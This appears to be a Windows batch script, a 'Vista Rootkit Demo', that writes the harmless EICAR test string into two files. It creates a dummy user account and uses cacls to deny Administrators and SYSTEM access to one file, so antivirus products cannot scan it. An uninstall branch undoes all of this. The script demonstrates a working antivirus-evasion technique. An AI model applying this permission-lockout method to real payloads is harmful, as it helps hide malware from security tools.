@Echo off echo ==================================== echo = VISTA ROOTKIT DEMO = echo = Using Permissions in your Favour = echo ===========================by Seal== rem (With Changes suggested by Jabzor) echo. rem This part checks whether to install/uninstall if exist %systemdrive%\vistarootkit_test\ (goto :uninstall) else mkdir %systemdrive%\vistarootkit_test\ rem Pre-installation warning. echo WARNING: USE AT YOUR OWN RISK. THE AUTHOR echo ACCEPTS NO RESPONSIBILITY FOR THE USE OF echo THIS SCRIPT. echo. PAUSE rem This part creates the virus-detectable files. copy %systemroot%\system.ini %systemdrive%\vistarootkit_test\infected_file_detectable echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*> %systemdrive%\vistarootkit_test\infected_file_detectable copy %systemroot%\system.ini %systemdrive%\vistarootkit_test\infected_file_undetectable echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*> %systemdrive%\vistarootkit_test\infected_file_undetectable rem This part creates the dummy user account net user viral_account /ADD echo Dummy account created... echo. rem This part re-assigns permissions to make one of the files invisible to AV products echo Assigning permissions to dummy account. (Say "Yes") cacls %systemdrive%\vistarootkit_test\infected_file_undetectable /P viral_account:F echo. echo Removing Administrator access. (Say "Yes") cacls %systemdrive%\vistarootkit_test\infected_file_undetectable /P Administrators:N echo. echo Removing SYSTEM access. (Say "Yes") cacls %systemdrive%\vistarootkit_test\infected_file_undetectable /P SYSTEM:N echo. echo Permissions re-assigned... echo. echo. echo Everything is now setup. Two identical files have been placed echo in your %systemdrive%\vistarootkit_test\ directory. One is detectable by your echo anti-virus product, the other isn't. echo. echo ==================================== echo Installation complete. goto end :uninstall echo Files already detected. Uninstalling. echo 1. Re-assigning permissions... cacls %systemdrive%\vistarootkit_test\infected_file_undetectable /P Administrators:F echo. echo 2. Deleting files... del %systemdrive%\vistarootkit_test\infected_file_undetectable %systemdrive%\vistarootkit_test\infected_file_detectable rmdir %systemdrive%\vistarootkit_test\ echo 3. Removing dummy account. net user viral_account /DEL echo ==================================== echo Uninstallation complete. :end echo. PAUSE